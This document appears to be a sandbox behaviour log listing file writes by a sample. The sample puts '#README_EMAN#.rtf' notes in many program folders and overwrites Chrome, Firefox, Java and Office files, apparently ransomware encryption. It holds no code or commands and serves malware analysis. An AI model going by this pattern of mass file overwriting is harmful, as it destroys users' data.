| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Extensions\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\setup.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\setup.exe | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\setup.exe | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\drive.crx | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\drive.crx | size = 4096 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | size = 61440 |
|
4 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\#README_EMAN#.rtf | size = 3079 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\am.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\am.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrmstp.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrmstp.exe | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrmstp.exe | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\et.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\et.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\kn.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\kn.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\kn.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\en-GB.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\en-GB.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\desktop.ini | size = 1590 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\bg.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\id.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\icudtl.dat | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | size = 34184 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\en-US.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\en-US.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | size = 61440 |
|
136 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\id.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\icudtl.dat | size = 61440 |
|
17 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\icudtl.dat | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\bg.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\bg.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\pt-BR.pak | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\he.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\el.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\pt-BR.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\pt-BR.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\el.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\el.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\he.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\nb.pak | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hi.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hi.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hi.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\gmail.crx | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\gmail.crx | size = 4096 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\#README_EMAN#.rtf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\#README_EMAN#.rtf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\lv.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\lv.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\de.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\de.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\te.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\te.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\te.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ca.pak | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\nb.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\nb.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fr.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fr.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\gu.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\gu.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\gu.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ru.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ru.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ml.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ml.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ml.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ko.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ko.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hu.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hu.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\charsets.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\charsets.jar | size = 61440 |
|
4 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\charsets.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sv.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sv.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\lt.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\lt.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\snapshot_blob.bin | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\snapshot_blob.bin | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\snapshot_blob.bin | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\javaws.policy | size = 1514 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20170524140843.pma | size = 8256 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fa.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fa.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\pt-PT.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\pt-PT.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sk.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sk.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ro.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ro.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\it.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\it.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ms.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ms.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\uk.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\uk.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\th.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\th.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\th.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sr.pak | size = 9608 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sr.pak | size = 32768 |
|
2 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi | size = 2444 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\tr.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\tr.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\nl.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\nl.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\logo.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\logo.png | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_de.properties | size = 4722 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\smalllogocanary.png | size = 9258 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\smalllogo.png | size = 9339 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\freebl3.chk | size = 2315 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\docs.crx | size = 5994 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\application.ini | size = 2134 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe | size = 4424 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\precomplete | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\precomplete | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_TW.properties | size = 5168 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\logocanary.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\precomplete | size = 5151 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\logocanary.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\VisualElements\VisualElements_70.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\VisualElements\VisualElements_70.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\#README_EMAN#.rtf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\#README_EMAN#.rtf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\zh-TW.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\zh-TW.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\VisualElements\VisualElements_150.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\features\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\nacl_irt_x86_64.nexe | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\nacl_irt_x86_64.nexe | size = 61440 |
|
4 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\nacl_irt_x86_64.nexe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\VisualElements\VisualElements_150.png | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\_platform_specific\win_x64\widevinecdmadapter.dll.sig | size = 2823 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig | size = 3053 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi | size = 3133 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\defaults\pref\channel-prefs.js | size = 1661 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\features\aushelper@mozilla.org.xpi | size = 4700 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\dependentlibs.list | size = 1910 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\platform.ini | size = 1582 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\es-419.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\es-419.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hr.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hr.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\updater.ini | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\updater.ini | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\features\#README_EMAN#.rtf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\features\#README_EMAN#.rtf | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\features\#README_EMAN#.rtf | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\uninstall\shortcuts_log.ini | size = 1738 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\features\e10srollout@mozilla.org.xpi | size = 4889 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\softokn3.chk | size = 2315 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\firefox.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\firefox.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\mr.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\mr.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\mr.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jfxrt.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jfxrt.jar | size = 61440 |
|
17 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sl.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sl.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\updater.ini | size = 2660 |
|
1 | |
| Write | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | size = 6598 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\voucher.bin | size = 6142 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\zh-CN.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\zh-CN.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\voucher.bin | size = 7352 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini | size = 2660 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\manifest.json | size = 2366 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\crashreporter-override.ini | size = 2198 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jfxrt.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\crashreporter.ini | size = 5416 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\omni.ja | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\nssdbm3.chk | size = 2315 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\omni.ja | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\#README_EMAN#.rtf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\#README_EMAN#.rtf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\omni.ja | size = 61440 |
|
17 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\omni.ja | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey\0.1\manifest.json | size = 1643 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\update-settings.ini | size = 1548 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\omni.ja | size = 61440 |
|
17 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\omni.ja | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\removed-files | size = 2062 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.bfc | size = 5186 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\#README_EMAN#.rtf | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\#README_EMAN#.rtf | size = 61440 |
|
17 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\#README_EMAN#.rtf | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\_platform_specific\win_x64\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\extensions\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\browser\VisualElements\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\defaults\pref\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\uninstall\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Maintenance Service\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\updater.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\updater.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\hijrah-config-umalqura.properties | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\hijrah-config-umalqura.properties | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\update-settings.ini | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\update-settings.ini | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\update-settings.ini | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#README_EMAN#.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#README_EMAN#.rtf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\javaws.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\javaws.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\javaws.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.password.template | size = 4272 |
|
1 | |
| Write | C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey\0.1\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\rt.jar | size = 34184 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\rt.jar | size = 61440 |
|
68 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\rt.jar | size = 16384 |
